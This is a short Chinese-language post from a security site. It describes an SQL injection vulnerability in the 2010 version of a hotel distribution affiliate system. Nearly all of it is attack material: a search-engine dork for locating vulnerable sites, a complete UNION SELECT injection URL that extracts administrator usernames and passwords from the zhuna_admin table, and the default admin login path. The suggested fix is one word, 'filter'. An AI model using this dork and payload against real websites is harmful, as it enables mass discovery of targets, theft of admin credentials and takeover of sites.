频道栏目
首页 > 安全 > 网站安全 > 正文

住哪酒店分销联盟系统2010 SQL注入漏洞及修复

2011-08-12 11:02:54           
收藏   我要投稿

适用版本:住哪酒店分销联盟系统2010
Search: inurl:index.php?m=hotelinfo
http://www.2cto.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

默认后台:index.php?m=admin/login

 修复:过滤

上一篇:腾讯URL跳转漏洞及修复
下一篇:利用mysql注射点得到更多信息
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站